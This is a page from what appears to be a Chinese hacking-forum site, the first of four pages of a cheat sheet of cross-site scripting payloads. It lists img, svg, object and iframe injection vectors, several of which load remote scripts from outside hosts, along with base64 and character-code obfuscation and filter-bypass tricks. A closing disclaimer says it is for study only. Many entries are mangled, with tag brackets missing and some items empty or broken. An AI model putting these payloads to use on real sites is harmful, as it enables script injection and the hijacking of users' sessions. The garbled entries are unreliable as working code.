欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

xss其他标签下的js用法总结大全

来源:本站整理 作者:佚名 时间:2016-07-17 TAG: 我要投稿
img src=javascript:document.write('+'ipt src=\'http://www.baidu.com/1.txt\'>+'ipt>')>/img>  //仅支持IE6
img src=javascript:window.s=document.createElement('script');window.s.src='http://lcx.cc/1.js';document.body.appendChild(window.s);>/img>  //仅支持IE6
img src="pdpdp.gif">/img>   //通杀所有浏览器 能触发xss
img src="pdpdp.gif">/img>   //通杀所有浏览器 能触发xss
img src=x onerror=document.body.appendChild(document.createElement("scr"+"ipt")).src="http://www.baidu.com">
input autofocus="bbbb" />
object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUkd1V0REUz48L3NjcmlwdD4=">/object>
iframe width="0px" height="0px" src="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUkd1V0REUz48L3NjcmlwdD4=">/iframe>  ie不支持
a href="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3d3dy5wb29qeC5jb20vMS5qcz48L3NjcmlwdD4=">sb/a>
anchor>、img>(不执行js) a>(需点击) meta>.....
anchor onload=document.body.appendChild(document.createElement("scr"+"ipt")).src="http://www.baidu.com">
svg onload=document.body.appendChild(document.CReateElement("scr"+"ipt")).src="http://www.baidu.com">
svg onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,46,99,110,47,82,71,117,87,68,68,83,62,60,47,115,99,114,105,112,116,62))>
baa id="1" tabindex=0>
(1)普通的XSS JavaScript注入
SRC=http://3w.org/XSS/xss.js>
(2)IMG标签XSS使用JavaScript命令
SRC=http://3w.org/XSS/xss.js>
(3)IMG标签无分号无引号
IMG SRC=javascript:alert(‘XSS’)>
(4)IMG标签大小写不敏感
IMG SRC=JaVaScRiPt:alert(‘XSS’)>
(5)HTML编码(必须有分号)
IMG SRC=javascript:alert(“XSS”)>
(6)修正缺陷IMG标签
IMG “”">alert(“XSS”)”>
(7)formCharCode标签
(8)UTF-8的Unicode编码
(9)7位的UTF-8的Unicode编码是没有分号的
(10)十六进制编码也是没有分号
 /span>
(11)嵌入式标签,将Javascript分开
IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
(12)嵌入式编码标签,将Javascript分开
IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
(13)嵌入式换行符
IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
(14)嵌入式回车
IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
IMG SRC=\'#\'" /span>
(16)解决限制字符(要求同页面)
z=’document.’
z=z+’write(“‘
z=z+’’
z=z+’ src=ht’
z=z+’tp://ww’
z=z+’w.shell’
z=z+’.net/1.’cript>
z=z+’js>/sc’cript>
z=z+’ript>”)’
eval_r(z)
(17)空字符
perl -e ‘print “IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “SCR\0IPT>alert(\”XSS\”)/SCR\0IPT>”;’ > out
(19)Spaces和meta前的IMG标签

上一页  [1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载